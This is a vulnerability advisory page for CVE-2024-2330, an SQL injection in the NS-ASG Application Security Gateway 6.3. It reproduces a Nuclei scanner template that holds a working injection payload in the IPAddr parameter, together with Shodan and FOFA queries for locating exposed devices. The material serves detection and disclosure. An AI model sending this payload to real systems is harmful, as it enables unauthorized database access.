CVE-2024-2330: NS-ASG Application Security Gateway 6.3 - Sql Injection

日期: 2025-08-01 | 影响软件: NS-ASG Application Security Gateway | POC: 已公开

漏洞描述

A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

PoC代码[已公开]

id: CVE-2024-2330

info:
  name: NS-ASG Application Security Gateway 6.3 - Sql Injection
  author: s4e-io
  severity: medium
  description: |
    A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-2330
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2330
    - https://github.com/jikedaodao/cve/blob/main/NS-ASG-sql-addmacbind.md
    - https://vuldb.com/?ctiid.256281
    - https://vuldb.com/?id.256281
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.3
    cve-id: CVE-2024-2330
    cwe-id: CWE-89
    epss-score: 0.92746
    epss-percentile: 0.99746
  metadata:
    max-request: 2
    shodan-query: http.title:“NS-ASG”
    fofa-query: app="网康科技-NS-ASG安全网关"
  tags: cve,cve2024,ns-asg,sqli,vkev

http:
  - raw:
      - |
        POST /protocol/index.php  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"XPATH syntax error:","alert") && contains(header,"text/html")'
          - "status_code == 200"
        condition: and

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "XPATH syntax error: '([~0-9.]+)'"
# digest: 4a0a004730450220360c839646ed6115e561bd244125bab82bf675c7d31aec2cd92c015f683c9ba6022100e6481d10230489acb961c639089842cc5d4c2e9aa671862dcb080ebfd7c29f2c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-2330.yaml